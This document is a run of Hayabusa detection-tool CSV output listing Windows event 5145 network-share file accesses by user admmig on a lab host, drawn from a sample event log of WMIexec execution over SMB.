+2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b#\2d63d4f586d1192cb1d550c159a42729 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b#\71d44db8d855f43bafe707aabf0050d7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d#\d33525eb35c4aa8b45b1e60e144e50ab | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build\d6c8ca8dfe9cd143210459e72a546bf8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22#\95eb335a0d6884a4b311ce7041f71bc3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8#\81fd3145ed18f31e338ec4dcb5afd7f7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b#\2dab9f12dfcdb3bd487693c1bb12e0a6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0#\4d5abc40df9ad72124f147d1d55dd690 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\004d51a9ac1d91d6537ad572591ebbd3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#\b7a83293c2e4f23480fc3660b70099e6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235#\f8fa567f21f9aef0ae471c625b59c159 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420#\5d1b6f60febb9cec91a92675a96ee63d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\b101a91893057573f159893cb9c2f28d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#\e037edd0e9a4a487424cd2d4e3527c92 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a#\aaf7a4161dcd6792ce570a810a0c53f6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479#\662c453241af44299325f4c07d7f718c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#\154acb6c70e2dddd2c94bf0bc748b8b7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084#\9d9142f584dbdd4e6d4bd7fd6f877b66 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5#\ba928c3b8a0cdac392162a6b572de29f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a#\1b67145a56e345e0d2e731357f498c1d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e#\e857b644c45626101624d874e1860701 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168#\1b9aff98baffeed692a8e8768c0c4e47 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\2f732bd1dcfeef1bb935c1d1444abdef | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#\4844f53bd0e47d8f8a5795e6484a0f88 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656#\a169d08938fb7766d16496db1e648137 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#\75b419c806fb708ac368c6282c922a84 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\dd3aaf75f45749961d52d194dab801a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
